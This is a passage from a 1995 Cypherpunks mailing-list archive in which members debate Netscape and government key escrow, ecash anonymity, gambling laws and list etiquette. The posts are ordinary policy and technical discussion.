have a big-ass bankroll and a rolodez full of connections to begin with, you can expect to find your ass in jail and your posessions on the auction block just as soon as someone takes notice of you. But thanks to the InterNet, thats all changed. =) I for one would be happy to pay all applicatable income taxes to any government that would allow me to host gambeling via the net and promise not to throw me in jail for making too much money too fast or not following some outdated work ethic. Of course, you still run the risk that you might wake up one night to find yourself sourrounded by Navy seals and assult copters, or that congress will mandate a national firewall on your site or something equally extream, but not unless you are really living the good life. =) Christopher From cjs at netcom.com Sun Dec 3 13:10:56 1995 From: cjs at netcom.com (Christopher J. Shaulis) Date: Sun, 3 Dec 95 13:10:56 PST Subject: Suggestion for CP browser In-Reply-To: <9512031205.AA24992@all.net> Message-ID: <199512032003.PAA00189@localhost.cjs.net> > I think a CP browser is just the ticket to change the way the world works. > How about this: > > - CP writes a browser with PGP or better quality crypto. > - CP makes it freely available to any individual > - CP licenses it to corporations for $1 per copy > - Funds produced go to support worthy causes, support a permanent > home for CP, and support anti GAK efforts (lobying, etc.) > > I think the CP browser should include an embedded language (not Java - > maybe a version of LISP) that does a far better job than Java of assuring > limitations on what programs can do. It should also support faking the > source of a browser request (for privacy of the user), all forms of digital > cash, firewall-type forwarding, pseudonyms, and all of the other things that > CPs fight for. I was just about to say something rude to whoever wrote this one, then I noticed who it was. Where is a clue hammer when you need one? Christopher From unicorn at schloss.li Sun Dec 3 13:11:16 1995 From: unicorn at schloss.li (Black Unicorn) Date: Sun, 3 Dec 95 13:11:16 PST Subject: EXO_ner In-Reply-To: Message-ID: On Sat, 2 Dec 1995, Dave Del Torto wrote: > At 9:34 AM 12/2/95, John Young wrote: > > >SenXon and The Washrag blow today about which has the most to > >be ashamed of and hide from the filthy lingerie leering > >republic. > > Exon, Exoff, XON, X-off, Exxon, ex-off. Wax on, wax off. > > dave > > ____________________________________________________________________ > "Packwood's supporters were left groping for answers." --news anchor > > > --- My prefered and soon to be permanent e-mail address: unicorn at schloss.li "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From cjs at netcom.com Sun Dec 3 13:12:11 1995 From: cjs at netcom.com (Christopher J. Shaulis) Date: Sun, 3 Dec 95 13:12:11 PST Subject: your mail In-Reply-To: Message-ID: <199512031959.OAA00178@localhost.cjs.net> My mail?? Who is the wise guy who keeps putting "Your mail" in the topic? Christopher From jamesd at echeque.com Sun Dec 3 13:14:45 1995 From: jamesd at echeque.com (James A. Donald) Date: Sun, 3 Dec 95 13:14:45 PST Subject: your mail Message-ID: <199512032115.NAA20213@blob.best.net> >At 11:32 PM 12/2/95 -0800, sameer wrote: > I hate to repeat myself, but sometimes people don't listen. >http://www.c2.org/apachessl/ > This Web page fails to explain what Apache-SSL actually is, what it is good for, and why people should use it. Looks like the page was constructed by the same marketing experts as Central Point Software employed before it went under. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From froomkin at law.miami.edu Sun Dec 3 13:22:35 1995 From: froomkin at law.miami.edu (Michael Froomkin) Date: Sun, 3 Dec 95 13:22:35 PST Subject: Questions/Comments on ecash protocol In-Reply-To: Message-ID: On Sun, 3 Dec 1995, Lucky Green wrote: [..cuts...] > At 22:40 12/2/95, Michael Froomkin wrote: > > >3) Is there a way [how hard is it] for charlie to extract a coin and > >either > > (i) copy it and/or > > > > (ii) send it to David [3rd party] in such a way > >that David could insert it into David's MTB software and then spend it to > >Sam without Sam or the Bank noticing that anything was wrong. If Charlie > >and David do this, David now has a coin that is from his point of view > >both payee and payor anonymous, although Charlie has a risk that David > >will double-spend and expose Charlie to the bank's wrath. > > I can't help the feeling that I am missing something whenever you bring up > this question. Assuming it could be done. What would David gain? He as the > payor is anonymous to Sam either way. Sam still would have to be worried > about being identified, since if Charlie gives David access to Charlie's > wallet, it is safe to assume that Charlie will give David (and the mint) > access to his blinding factor. Which in turn would reveal Sam as the payee. > > The protocol you suggest gives the parties exactly what they would have if > they just used Ecash "out of the box": full payor anonymity, no payee > anonymity. So why bother? > These scenarios only matter if the blinded coins have payer info coded into them. With zero payer info you are correct they are irrelevant. I was operating under the (incorrect, it seems) assumption that the blinded coins followed what I now understand to be the OFF-LINE ONLY version of the protocol. In that version, where the blinded coin issued to Alice has info about her coded on to it and/or there is information about payee encoded onto the coin, then such exchanges are necessary to create payee anonymity. Even with the current protocol, you can achieve payee anonymity if you send a coin to a coin clearinghouse that deposits for you. Alice gives Bob a coin for value. Bob turns the coin over to Carol who, for a small fee, deposits the coin. Now bank knows carol deposited the coin, but knows of neither Bob nor Alice. Indeed Bob need have no account at the bank at all. I recognize that there are issues here, esp. for Bob -- does he wait on line while Carol clears the coin before telling Alice that payment cleared (delays?). Or does he bear the risk? A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | U. Miami School of Law | froomkin at law.miami.edu P.O. Box 248087 | http://www.law.miami.edu/~froomkin Coral Gables, FL 33124 USA | It's warm here. From anonymous-remailer at shell.portal.com Sat Dec 2 21:36:14 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sun, 3 Dec 1995 13:36:14 +0800 Subject: ANNOUNCEMENT: ALICE'S ADDRESS REVEALED. Message-ID: <199512030524.VAA24279@jobe.shell.portal.com> As I promised, I've now opened a channel so that anyone who wants to can send Alice de 'nonymous email. I can now be reached via an455120 at anon.penet.fi. Mail sent to Alice de 'nonymous at that address will get to me, and I will do my best to reply to you as well, but I can't guarantee, anything. And before I get attacked for wasting bandwidth, I've got a deal to make it all worthwhile. A temporary break from GAK talk ... a pointer to a truly HOT website. Here's just a small sample of what you'll find there: :| ELIMINATING LIMBO :| :| "So the pope eliminated Limbo, did you hear?" she says :| "What?" :| "You know the pope, right, well he eliminated Limbo..." :| "When?" :| "I don't know, a while ago." :| "Well that means we're fucked..." :| "You got it." :| "What's Limbo for?"asks Jessica :| "That's where all the people that were around before they had the :| chance to get the word of christ get to go...and unbaptized babies :| that die early..." :| :| "It's not as good as Heaven, but it beats the hell out of the other :| options." :| "How can he just eliminate it like that?" :| "Cause he's the pope..." Check all of this out and MORE at the SCARED SACRED site. You'll be able to read the pope's "LETTER TO ALL THE WOMEN OF THE WORLD". :| "What he wrote a letter to all the women of the world? Man, his direct :| mail expenses must be huge!" :| "Yeah the people in the Vatican are just freaking out..." But you have to be running NETSCAPE. (1.1....NOT 2.0....OR IT JUST WON'T WORK...) Point your Navigators to http://www.banffcentre.ab.ca/ and then choose the --> Media & Visual Arts Page <-- and then from there the --> Artists Web, <-- and then just look for --> VELCRO RIPPER. <-- BE CAREFUL THOUGH IF YOU ARE PRONE TO EPILEPTIC ATTACKS!!!! IF YOU ARE, CHOOSE THE DIRECT ENTRANCE AND ENTER THERE!! YOU HAVE BEEN WARNED!!! Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From unicorn at schloss.li Sun Dec 3 13:41:18 1995 From: unicorn at schloss.li (Black Unicorn) Date: Sun, 3 Dec 95 13:41:18 PST Subject: Talking to Jim In-Reply-To: <199512031730.SAA06145@utopia.hacktic.nl> Message-ID: On Sun, 3 Dec 1995, Anonymous wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > Jim Clark was quoted as having written: > > > I made some pragmatic comments. > > > I said that if we are to use this encryption technology in > > business, we must have a better solution than to limit > > keylength or put keys in escrow. All governments of the world > > have a valid concern about terrorism and other activities of > > concern to the security of their nations. > > So what? If their position were (as it has long been in some countries) > that their "concern" is best addressed by wholesale eavesdropping and > informant networks, would you cave to that, too? This is an absurd > foundation. Worked great in France, right? No terrorist problems there or anything. > > All of them will continue to restrict our ability to provide > > products to their markets unless we build in some mechanism > > that allows them to legally access information that is in the > > interest of their national security. > > Whoa! You're giving away the store without a fight! You've been able to > capture what, 60-70% of the browser activity "market" and get a huge > amount of capitalization from the public market, and you're whining that > the world's going to end if government "restrictions" continue, just > because those restrictions might slow down your commercial world > conquest? Give me a break! Mr. or Ms. Anonymous here has hit on the nose what irritates me about Netscape's attitude. For them opposing GAK is not voluntarily installing it into their software, sending a lackey (who may or may not know squat about how to schmooze washington and beltway fever types) to babble at a conference, and generally snowjobbing the educated portions of the marketplace by claiming to be on their side in opposition to GAK. I am reminded of a certain dictator of a certain canaled nation who's anti-drug rhetoric was the strongest voice in Central and South America for a time. > LET THEM CONTINUE to restrict! That will take care of itself quite > handily. You're just afraid you'd miss some opportunities, or be one of > the commercial casualties, isn't that right? Isn't that what this is > really all about? I think it's more about laziness actually. Netscape would (should) see quite quickly that key escrow is going to hurt them in the foreign market, and to some extent in the United States. One would expect them to discover this and be screaming bloody murder. As I have said before, as I will repeat, I'm sure the list is tired of my babbling, Netscape has a voice. If Netscape were to scream and yell that GAK is unacceptable, people would take notice. What does Netscape have to lose exactly? If they still make GAK the law of the land, Netscape is, of course, probably going to comply. _What does that have to do with trying to prevent it from ever being made the law of the land?_ I am saddened that the company which has so much power today to further the technology, the freedom and velocity of information, and privacy, is such a bowl of pudding. > And a valid concern, too, but not at the expense of my > freedom! It seems clear from the way you put this that world > standardization at ANY level of security would satisfy your commercial > objectives. Which is a silly objective considering the inviability of a NSA designed escrow system in any foreign market. > > (We obviously cannot be involved in determining what is legal > > by the laws of that country.) Determining the falsehood of this statement is left as an exercise for the reader. > > > This is not just a US government problem. Until recently, > > France did not even allow us to sell products with 40-bit > > keys, much less 128-bit keys. > > And some of us think that such idiocy, like celibacy, is a > self-correcting phenomenon in this information age. Why any company would model their efforts after the French government is a complete mystery to me. > > A lot of ordinary citizens are rightly concerned about their > > own privacy. Here comes the snow job. > > > I am one of them. It's going to be a white christmas honey. > > > I do not want the government to snoop on me, > Did you buy road salt? > > but in fact the government, through the FBI, can now tap my > > phone without my knowing it by simply getting sufficient > > evidence that I am conducting illegal activities, then > > presenting this evidence to a court to get permission. I have > > no say in the matter. Gee, let's make sure they can do it for Netscape too! > > If we as a company were to take the position that in no case > > will we allow a government to get access to our encrypted > > messages, or refuse to allow key escrow with our products, > > the governments of the world will quickly put us out of > > business by outlawing the sale of our products in their > > countries. Wow. Where did you learn your economics? In the alternative, where did you learn your propaganda skills? This sounds like School of the America's Stuff. > I believe you have underestimated the power of a leading-edge > 21st-century information product that is "Not available where > regulated." I think you're copping out and looking for the easier, "Now > with the best encryption available! (because no one is allowed to offer > better)" In fact, if Netscape really wanted to do well, they should be promoting their product, which I might add has a strong showing in the 18-24/5 bracket- precisely that bracket likely to fret over government involvement, as "Crypto so strong, it is banned in (x) countries!" > > The fundamental issue is how do we accommodate the > > requirements of governments, while protecting our > > rights as citizens. WOAH! Now I'm REALLY pleased I sold my stock. They bloody well SOUND like the NSA. > > None of this represents the position of Netscape with > > respect to what we will do. Perhaps, perhaps not. It sure seems to represent the attitude we can expect even from the 'pro crypto' types in Netscape. If this is the limit of your potential.... > > But if we do not come up with a solution to this problem > > that is acceptable to each government, > > There it is: Supine, prostrate, submissive. Jim, and Netscape in general, simply has no idea what-so-ever what kind of sword they are carrying. Someone needs to give them a shot of something. > > > In fact, we could even be ordered by our own government to > > establish a key escrow system for its use inside the US. > The way you are going, you will. Why, as you sound so upset about this, aren't you DOING something? Why aren't you out behind a podium pounding your shoe with: "We will not accept GAK, it is wrong, we will bury you." The time for submission and kissupping, for which there will be MUCH time, as AFTER GAK is mandatory. (Some might argue that this is the time for work to have it repealed, but they don't know much about institutions in the U.S.) > > > Ironically, anyone in the US may import unbreakable > > encryption technology from another country -- we just > > cannot sell it back to them. No one ever accused the > > government of being rational. > > This is the clearest thing you've written in the whole piece He is confused. He knows the issue, he just doesn't know what to do. Like a child with a firearm. > > I chair an industry group called the "Global Internet > > Project", with members from almost twenty companies, > > including companies from Asia and Europe. This was the > > central issue we all agreed upon this morning, and we > > are putting together a policy statement whose purpose > > is to educate lawmakers on the importance of quick > > resolution of this matter. Wow. You have done more damage than you know. A quick resolution is going to be in your detrement. "Diamond, oh Diamond, you know not the mischief done." --- My prefered and soon to be permanent e-mail address: unicorn at schloss.li "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From jamesd at echeque.com Sun Dec 3 13:41:19 1995 From: jamesd at echeque.com (James A. Donald) Date: Sun, 3 Dec 95 13:41:19 PST Subject: Do the Right Thing Message-ID: <199512032141.NAA05386@blob.best.net> At 12:22 PM 12/3/95 -0800, Timothy C. May wrote: >Netscape, being the dominant browser company, and Microsoft, being the >dominant OS company, are in special positions to "build in Big Brother." Bill Gates, after some ducking, weaving, and equivocating, has said that GAK is a violation of our right to privacy. Jim Clark has said that GAK is the government benevolently protecting our privacy. I hope to see a "clarification" of Clark's position soon, and I am far from happy with the "clarification" provided by Jeff. > Netscape is becoming the yellow corn of the Web, and an obvious > "choke point" for the NSA and its sisters to mandate crypto policies. > Hence, the role of non-yellow-corn alternatives...) I recommend Mosaic, much improved in its latest release, and, unlike Netscape, standards compliant. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From fc at all.net Sun Dec 3 13:49:24 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Sun, 3 Dec 95 13:49:24 PST Subject: Globally legal Netscape Message-ID: <9512032146.AA07279@all.net> If Netscape wants a global product that is completely legal anywhere, all they have to do is eliminate all encryption. The deal they are cutting now is to claim that they provied privacy when they do not. The saddest part is that many people will believe they are secure: -> the credit card companies and ecash banks will charge interest on every transaction to pay for the fraud rates, -> the government will close its grip even tighter on individual freedom and get an even tighter stranglehold on free speech, -> politicians and right wing demogogues will begin to expose individuals for having abortions and reading smut and thinking the "wrong" way. I'm not asking you to believe this - only to look at history and see the parallels throughout time. - The Russian revolution resulted in purges killing hundreds of thousands of innocent people because of their private, turned public, views as expoused in their private writings. - The Soviet government took away personal privacy to keep their stranglehold on their people. - The Chinese government used cameras and other similar privacy-removing techniques to track down the peaceful protesters who stood for free speech in Tien-a-men square. - The Germans under Hitler used personal records to identify and murder millions of Jews and other peoples. These are just four examples of selected from this century! There are many more in each century. Personal privacy - freedom from unreasonable search and seizure - the right to bear arms - all of these tell me that the US constitution secures the ability of Americans to have secure personal encryption in the information age. The president of the United States, each member of congress, and each CIA and NSA and FBI agent swears to God that they will protect and defend these rights as a condition of taking their offices. Those that fail to support the constitution in this way should be tried as traitors. But instead, we see these people coercing Netscape into breaking the law on their behalf. Breaking the law by cooperating with the government in illegal search and seizure, breaking the law in preventing Americans from attaining privacy, and breaking the law by defrauding the public with false claims of privacy protection. This is the time for Netscape to prove itself to the public by taking a stand for the Constitution, for the law of the land, and for the people of the United Stated and the world. If Jeff the Netscape munitions expert sees this, I hope he forwards it to his boss, and I hope his boss considers seriously that he may be the instrument of a totalitarian state arising in the US and throughout the world. It's easy to say that you're not responsible and that it's the government's fault, and that you're just following orders. But there is an old saying - evil flourishes when good people do nothing. If money is what you worship, you can get it by standing on the dead bones of your fellow human beings. Hitler did it, it was done in the Russian revolution, it was done in the Soviet Union, it was done in China, and it will be done again and again, as long as the Netscapes of the world fail to make a stand when it counts. -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From sameer at c2.org Sat Dec 2 21:57:24 1995 From: sameer at c2.org (sameer) Date: Sun, 3 Dec 1995 13:57:24 +0800 Subject: Netscape gives in to key escrow In-Reply-To: Message-ID: <199512020833.AAA09396@infinity.c2.org> > > So, for a 15% reduction in salary and 30 days of job search, is it worth it? 30 days? in silicon valley? you *must* be joking. (i suppose the market for good net-folks isn't as big over on the right coast.) -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From unicorn at polaris.mindport.net Sat Dec 2 21:57:30 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Sun, 3 Dec 1995 13:57:30 +0800 Subject: GAK Flap Happening at a Good Time--Journalists Read! In-Reply-To: <30C006E4.D39@netscape.com> Message-ID: On Fri, 1 Dec 1995, Jeff Weinstein wrote: > James A. Donald wrote: > > > > I will prepare the netscape dehanced dirty pictures web page, > > but not advertize the URL until shortly after December 5th. > > > > I hope to hear a suitable "clarification" before then. > > See my recent message to this list. We will be taking an anti-GAK > position. So you will refuse to implement GAK in future version of netscape then? Or you will merely do lipservice to the GAK policies at the conference? I think the distinction is quite key. Forgive the pun. > --Jeff -- > Jeff Weinstein - Electronic Munitions Specialist > Netscape Communication Corporation > jsw at netscape.com - http://home.netscape.com/people/jsw > Any opinions expressed above are mine. --- "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From nowhere at bsu-cs.bsu.edu Sat Dec 2 22:04:17 1995 From: nowhere at bsu-cs.bsu.edu (Anonymous) Date: Sun, 3 Dec 1995 14:04:17 +0800 Subject: No Subject Message-ID: <199512030545.AAA01728@bsu-cs.bsu.edu> The recent flap over Netscape and GAK ought to serve as a wakeup call and a reminder of the advantages the anarchstic GNU/FSF paradigm of software development has over the corporate model. No one can control GNU code, and no entity can impose changes on everyone else. If everyone was using GNU browsers and ssl servers right now we'd be safe. Competing with Netscape is obviously something that's easier said than done. But we ought to consider the strategic importance of having robust, free, open source packages for security applications, even if affordable and high quality commercial products exist. From pfarrell at netcom.com Sun Dec 3 14:09:25 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Sun, 3 Dec 95 14:09:25 PST Subject: Do the Right Thing Message-ID: <61765.pfarrell@netcom.com> I personally believe that this topic does not deserve the heat that it has generated on this list. This opinion could change. I'll have a much better idea Tuesday evening when I've had a chance to hear the latest from NIST on GAK for export. Much of the complaining in September was that vendors didn't want to build two versions, one domestic and one for "export" Netscape is currently doing at least two, and probably closer to ten if you count Windows 16, 32, Mac, Motif, etc. tcmay at got.net (Timothy C. May) writes: > Netscape, being the dominant browser company, and Microsoft, being the > dominant OS company, are in special positions to "build in Big Brother." > I'm not claiming they are, just that they are clearly in a position to > make it technologically more feasible to make non-GAK illegal. They both > need to carefully think about the role that's been "given" to them > (whether by fortune, hard work, or being in the right place at the right > time) and do what's right. Except for Louis Freeh and Dorrthy Denning, I haven't heard real people support GAK domestically, although Geoff Grevildinger's pitch at the Sept NIST meeting was 99 & 44/100% domestic. I'll be listening pretty carefully this Tuesday. I think we need to save out fury for real statements about making non-GAK illegal for domestic use. If this starts to condense out of the Ether, I expect that the civil liberties lobbies will get real loud. the ACLU and VTW were both vocal at the September meeting, and EPIC was there, along with folks like Proffessor Hoffman of GW. > And what Netscape agrees to put in future releases of its browsers or its > servers could have dramatic effects on the whole climate. I have no problem with Netscape having a GAK-ified browser in addition to a real one. At least as long as the GAK'd version is clearly identified -- a logo saying "big brother inside" covering 25% of the screen should do it for me. > And if export laws demand GAK in exported products, Netscape should "do > the right thing" and have two versions. It may add to their costs a > little, but it's better than building in the machinery for a GAK law to > later be passed. Netscape is currently doing two (or ten) version. This simple fact seems to have been lost by most of the posters in the past few days. If the issue is just that people don't like the idea that the free, downloadable is GAK'd and that they have to pay $50 for a browser with strong crypto, please take your whining off list. Or find one you like (Netmanage's is too buggy for me, but Mosaic version 2 is quite usable, as is Microsoft's, IMHO) > (Explain something to me. I have never, ever understood why it is a > concern of the U.S. government that we help build in GAK for foreign > governments, that we make sure that products intended for export to > France or Syria have GAK that allows those governments to read the > traffic of their citizens. And if the concern is that exported versions > of software must be readable to the _United States_, then this is a > non-starter in terms of sales in many or even most foreign countries! I'm > sure France will welcome with open arms a version of Netscape that allows > the NSA to read the traffic of French citizens. Oh, by the way, what > legal jurisdictions will be involved in obtaining the escrowed keys of > foreigners? The answers are both clear and murky, if you catch my drift.) The "criteria" (see my http://www.isse.gmu.edu/~pfarrell/nistmeeting.html page) clearly say that approved systems can _not_ interoperate with unapproved systems. This means that exportable systems can not interoperate with, say, PGP. There was talk about having multinational treaties so the French, Iranian, and other "friends" could access the GAK's messages, but that was recognized as being many years out. Diplomacy is slow. It was quite clear from multinational vendors that they thought that non-US corporations would _absolutely not_ accept GAK in the US. The main effect of this stupid export stuff is to drive crypto development offshore. > If the U.S. insists on GAK _within the U.S._, as many of us fear is the > long-term danger, then all bets are off anyway. But I would hope that > Netscape does nothing to make it _easier_ to make this the case! It was quite clearly implied at the September meetings that the Government expected that vendors would do only one version, GAK'd. This would allow the LEAs to tromple all over US civil liberties at will. > A viable thing for Netscape to do is to announce forthrightly that it will > separate the issue of export from what it sells in the U.S., that there > will be NO GAK included in any U.S.-sold packages. The quest for an "all > world" version, freely exportable, should not take precedence over the > civil liberties issues. And I predict that any slight losses in market > share or slight increases in product cost will be _less_ than the effects > Netscape will see if their product comes to be associated with "Big > Brother Inside." I've been developing software too long to accept that the increases in product support costs will be "slight". But I agree that Netscape should _continue_ to have three separate versions, one for domestic use, a second one for export from the US, and the third with Fortessa for sale to Govie agancies that want it. They probably need to add a fourth version, a strong foreign version developed offshore. Tim's suggestion of a formal statement that separates domestic product from export, and clearly leaves GAK out of US products, is a very good one. It is close to what Netscape is doing now, it is completely consistant with current and publically announced policies, and it would let this list return to discussions that are relevant to cryptography. Pat Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info. Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include From shamrock at netcom.com Sat Dec 2 22:14:12 1995 From: shamrock at netcom.com (Lucky Green) Date: Sun, 3 Dec 1995 14:14:12 +0800 Subject: Questions/Comments on ecash protocol Message-ID: At 22:40 12/2/95, Michael Froomkin wrote: >thank you for the sterling analysis. I for one am following this with >enormous interest, even though some of the details are lost on me right now. [Well done, Ian!] [...] >1) What information about Charlie/customer is encoded onto the coin? None. >(There must be some, right, since the serial number is blinded?) Since the >bank doesn't know what serial number it is signing, it needs to put info >about Charlie onto the coin so that it can track him down if he double >spends. Lacking such info, the bank can refuse to honor a double-spent >coin, but has no way to know who the double-spender is. Since an online clearing protocol is being used, the bank has no need to identify double spenders. The bank will simply refuse to honor a double spent coin. In fact, cancelling a payment in this protocol is done by just depositing the coin yourself. >3) Is there a way [how hard is it] for charlie to extract a coin and >either > (i) copy it and/or > > (ii) send it to David [3rd party] in such a way >that David could insert it into David's MTB software and then spend it to >Sam without Sam or the Bank noticing that anything was wrong. If Charlie >and David do this, David now has a coin that is from his point of view >both payee and payor anonymous, although Charlie has a risk that David >will double-spend and expose Charlie to the bank's wrath. I can't help the feeling that I am missing something whenever you bring up this question. Assuming it could be done. What would David gain? He as the payor is anonymous to Sam either way. Sam still would have to be worried about being identified, since if Charlie gives David access to Charlie's wallet, it is safe to assume that Charlie will give David (and the mint) access to his blinding factor. Which in turn would reveal Sam as the payee. The protocol you suggest gives the parties exactly what they would have if they just used Ecash "out of the box": full payor anonymity, no payee anonymity. So why bother? -- Lucky Green PGP encrypted mail preferred. From mhw at wittsend.com Sun Dec 3 14:29:53 1995 From: mhw at wittsend.com (Michael H. Warfield) Date: Sun, 3 Dec 95 14:29:53 PST Subject: your mail In-Reply-To: <199512031959.OAA00178@localhost.cjs.net> Message-ID: Christopher J. Shaulis enscribed thusly: > My mail?? > Who is the wise guy who keeps putting "Your mail" in the topic? Kidding, right? Snicker. It's not a who - it's a what. Some twit DID NOT put a subject on the ORIGINAL message. The next person(s) who replied to him had a mail program which recognized the lack of a "Subject" and substituted "Your mail". That beats a subject line of "Subect: Re:"... Actually and technically they don't bother to "spot" the lack of a Subject. The programs set their default subject for replys to "Your mail" and then if the read a Subject header, it overrides the default. I know elm does and I believe pine does, as well as a host of others. Works well for personal mail even if it does look STUPID on a mailing list. Only known cure is to make sure you have a REAL SUBJECT. > Christopher -- Michael H. Warfield | (770) 985-6132 | mhw at WittsEnd.com (The Mad Wizard) | (770) 925-8248 | http://www.wittsend.com/mhw/ NIC whois: MHW9 | An optimist believes we live in the best of all PGP Key: 0xDF1DD471 | possible worlds. A pessimist is sure of it! From rthomas at pamd.cig.mot.com Sun Dec 3 14:30:09 1995 From: rthomas at pamd.cig.mot.com (Robert Owen Thomas) Date: Sun, 3 Dec 95 14:30:09 PST Subject: Globally legal Netscape In-Reply-To: <9512032146.AA07279@all.net> Message-ID: <9512031626.ZM17818@pamd.cig.mot.com> look, this is just a *bit* extreme. having been one of those folks sworn to uphold the Constitution, i can tell all of you that there is no master plan to rid the American people of their rights and freedom. this is not to say we should not keep a sharp and keen eye open for any assault upon our liberties. rather, having "BEEN THERE", i just do not see any threat along the lines of, er, Hitler, Stalin, Mussolini, et. al. let's try to keep this in perspective, Fred. perhaps a little less caffiene would help? ;-) regards, --robert, a former U.S. government employee...but i won't say where...;-) -- o Robert Owen Thomas: Corvette pilot. Cymro ydw i. User scratching post. o o E-mail: Robert.Thomas at pamd.cig.mot.com --or-- robt at Cymru.COM o o Vox: 708.435.7076 Fax: 708.435.7360 o o "When I die, I want to go sleeping like my grandfather... o o Not screaming like the passengers in his car." o From sameer at c2.org Sat Dec 2 22:37:54 1995 From: sameer at c2.org (sameer) Date: Sun, 3 Dec 1995 14:37:54 +0800 Subject: prototype slot-machine Message-ID: <199512030623.WAA17815@infinity.c2.org> I've written up a slot-machine thing for ecash, very experimental, very buggy, not very slick, (i'd like to get the technical bugs worked out before i put a fancy wrapper on it) and i'd *like* to announce it here for testing, but I'm worrying about gambling laws.. any thoughts? -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From j.miranda3 at genie.com Sun Dec 3 14:38:47 1995 From: j.miranda3 at genie.com (j.miranda3 at genie.com) Date: Sun, 3 Dec 95 14:38:47 PST Subject: info? Message-ID: <199512032235.AA089570133@relay1.geis.com> Can you send me information about your organization? --Joseph Miranda From ecarp at netcom.com Sat Dec 2 22:48:21 1995 From: ecarp at netcom.com (Ed Carp) Date: Sun, 3 Dec 1995 14:48:21 +0800 Subject: GAK, Netscape, CyberDog, and you. Message-ID: <199512030737.BAA02145@khijol> > Date: Fri, 1 Dec 1995 11:58:26 -0500 > To: semper.fi at solutions.apple.com > From: rah at shipwright.com (Robert Hettinga) > Subject: GAK, Netscape, CyberDog, and you. > Cc: cypherpunks at toad.com, mcip at deepeddy.com, www-buyinfo at allegra.att.com, > ecm at ai.mit.edu, bsdc at ai.mit.edu > I hear that with CyberDog, building a secure Netscape-compatible browser in > OpenDoc is now pretty simple. That adding economically useful -- and Where can one get more information on CyberDog? From tcmay at got.net Sun Dec 3 14:58:03 1995 From: tcmay at got.net (Timothy C. May) Date: Sun, 3 Dec 95 14:58:03 PST Subject: Do the Right Thing Message-ID: At 9:09 PM 12/3/95, Pat Farrell wrote: >I personally believe that this topic does not deserve the heat that it >has generated on this list. This opinion could change. I'll have a much >better idea Tuesday evening when I've had a chance to hear the latest from >NIST on GAK for export. Well, people discuss what they think is important. Those who don't think this topic is important are of course not compelled to participate in the debate. >I think we need to save out fury for real statements about making >non-GAK illegal for domestic use. If this starts to condense out ... >I have no problem with Netscape having a GAK-ified browser in addition >to a real one. At least as long as the GAK'd version is clearly identified >-- a logo saying "big brother inside" covering 25% of the screen should >do it for me. These two points are what many of us are concerned about. Some may argue "Wait until it's illegal, then protest," but I think the Cypherpunks list has shown a particular strength in spotting "early warning signals" well in advance of actual developments, thus enabling us to get our ducks in line and hit the ground running (to mix some metaphors). Is it too early to worry about outlawing of non-GAKked crypto? Hal Abelson has this in the preliminary program for CFP '96, sent out today: "Events planned for this year's conference include: - Federal prosecutors square off against civil-liberties lawyers in a Supreme Court test of the "Cryptography Control Act of 1996", which criminalizes non-escrowed encryption." ... >It was quite clearly implied at the September meetings that the >Government expected that vendors would do only one version, GAK'd. >This would allow the LEAs to tromple all over US civil liberties >at will. This was my point about having a domestic and an export version. (You mentioned that Netscape already does this, and in fact probably has 10 or more versions, for various platforms. Fine. Many of us want to keep it that way, especially with regard to GAK. Saying that Netscape wants "a single version with crypto suitable for all" is not OK if that version includes GAK. This is what I am urging Netscape to take a stance on, now, soon, quickly.) >Tim's suggestion of a formal statement that separates domestic product >from export, and clearly leaves GAK out of US products, is a very good one. >It is close to what Netscape is doing now, it is completely consistant >with current and publically announced policies, and it would >let this list return to discussions that are relevant to ^^^^^^^^^^^ >cryptography. ^^^^^^^^^^^^ Pat, if the policies and technologies surrounding key escrow are not relevant to the themes of the Cypherpunks list, I surely don't know what is! That so many people are commenting on this topic, and not, say, on a more "relevant" topic such as "Fermat factorization and the rho method in elliptic curve cryptosystems" tells us what the apparent focus of the list is. (Fact is, there are only a handful of folks on the list--and perhaps in the world only a few hundred--who have strong competency in these areas....asking that the list confine itself itself to discussions "relevant to cryptography" is pointless. Technical cryptography is probably better handled in sci.crypt or sci.crypt.research, or at conferences. And "How to Use PGP" questions are better handled in many other places. Just my opinion. Others are of course welcome to discuss how to use PGP or the intricacies of quadratic reciprocity, just as I will feel welcome to discuss key escrow in its various forms and implications. People talk about what matters to them, for the most part, and attempts to "steer" the list to other topics are best done by example. That is, write up a really interesting article on some "relevant" topic and perhaps people will discuss it. That seems better than saying a discussion of GAK is not relevant. And the NIST/NSA meeting is coming up in a few days...what better time to discuss some issues, and thus possibly trigger some ideas or arguments for attendees to make, than now? What's the point of waiting until it's over, when all we can do then is complain? I think key escrow, whether of the Clipper variety of the SKE variety, is central to the themes of the group. --Tim May Views here are not the views of my Internet Service Provider or Government. 